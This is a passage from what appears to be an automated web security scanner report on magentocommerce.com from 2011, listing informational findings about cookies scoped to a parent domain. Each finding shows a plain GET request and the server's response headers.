User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175724; expires=Sat, 11-Aug-2012 15:02:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fproduct%2Ffaq%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:04 GMT
Content-Length: 38677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.121. http://www.magentocommerce.com/product/features  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/features

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/features HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175665; expires=Sat, 11-Aug-2012 15:01:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fproduct%2Ffeatures%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:05 GMT
Content-Length: 47349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.122. http://www.magentocommerce.com/product/hosted-solutions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/hosted-solutions

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/hosted-solutions HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175686; expires=Sat, 11-Aug-2012 15:01:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproduct%2Fhosted-solutions%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:26 GMT
Content-Length: 32763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.123. http://www.magentocommerce.com/product/magento-go  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/magento-go

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/magento-go HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175671; expires=Sat, 11-Aug-2012 15:01:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fproduct%2Fmagento-go%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:11 GMT
Content-Length: 36074

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.124. http://www.magentocommerce.com/product/magento-zend  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/magento-zend

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/magento-zend HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175743; expires=Sat, 11-Aug-2012 15:02:23 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fproduct%2Fmagento-zend%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:23 GMT
Content-Length: 34344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.125. http://www.magentocommerce.com/product/mobile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/mobile

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/mobile HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175711; expires=Sat, 11-Aug-2012 15:01:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fproduct%2Fmobile%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:52 GMT
Content-Length: 108871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.126. http://www.magentocommerce.com/product/professional-edition  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/professional-edition

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/professional-edition HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175663; expires=Sat, 11-Aug-2012 15:01:03 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproduct%2Fprofessional-edition%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:03 GMT
Content-Length: 40267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.127. http://www.magentocommerce.com/products/checkout/cart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/checkout/cart/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/checkout/cart/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; expires=Sat, 13-Aug-2011 15:02:50 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:02:49 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:02:49 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:02:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:02:49 GMT; path=/; domain=magentocommerce.com
Content-Length: 23027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Shopping
...[SNIP]...
3.128. http://www.magentocommerce.com/products/job-post.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/job-post.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/job-post.html HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; expires=Sat, 13-Aug-2011 15:02:58 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:02:57 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:02:57 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:02:57 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:02:57 GMT; path=/; domain=magentocommerce.com
Content-Length: 31391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Job Post
...[SNIP]...
3.129. http://www.magentocommerce.com/pt_BR  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /pt_BR

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pt_BR HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176586; expires=Sat, 11-Aug-2012 15:16:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fpt_BR%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:27 GMT
Content-Length: 109441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.130. http://www.magentocommerce.com/roadmap  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /roadmap

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /roadmap HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176586; expires=Sat, 11-Aug-2012 15:16:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Froadmap%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:26 GMT
Content-Length: 87

<script>document.location = 'http://www.magentocommerce.com/product/features';</script>
3.131. http://www.magentocommerce.com/roadmap/issue-roadmap  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /roadmap/issue-roadmap

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /roadmap/issue-roadmap HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176444; expires=Sat, 11-Aug-2012 15:14:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Froadmap%2Fissue-roadmap%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:04 GMT
Content-Length: 34644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.132. http://www.magentocommerce.com/ru  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /ru

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ru HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176501; expires=Sat, 11-Aug-2012 15:15:01 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fru%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:03 GMT
Content-Length: 69663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.133. http://www.magentocommerce.com/services  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /services HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176207; expires=Sat, 11-Aug-2012 15:10:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fservices%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:08 GMT
Content-Length: 36548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.134. http://www.magentocommerce.com/services/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /services/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175732; expires=Sat, 11-Aug-2012 15:02:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fservices%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:12 GMT
Content-Length: 36548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.135. http://www.magentocommerce.com/services/contact-us-popup  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/contact-us-popup

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /services/contact-us-popup HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175780; expires=Sat, 11-Aug-2012 15:03:00 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fservices%2Fcontact-us-popup%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:00 GMT
Content-Length: 3090

<div class="contact-popup-top">
<div class="top-l-corner"></div>
<div class="top-r-corner"></div>
</div>
<a class="popup-close" onclick="contactBox.close();" href="#"><img src="http://www.mage
...[SNIP]...
3.136. http://www.magentocommerce.com/services/course-pricing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/course-pricing

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /services/course-pricing HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175747; expires=Sat, 11-Aug-2012 15:02:27 GMT; path=/; domain=magentocommerce.com
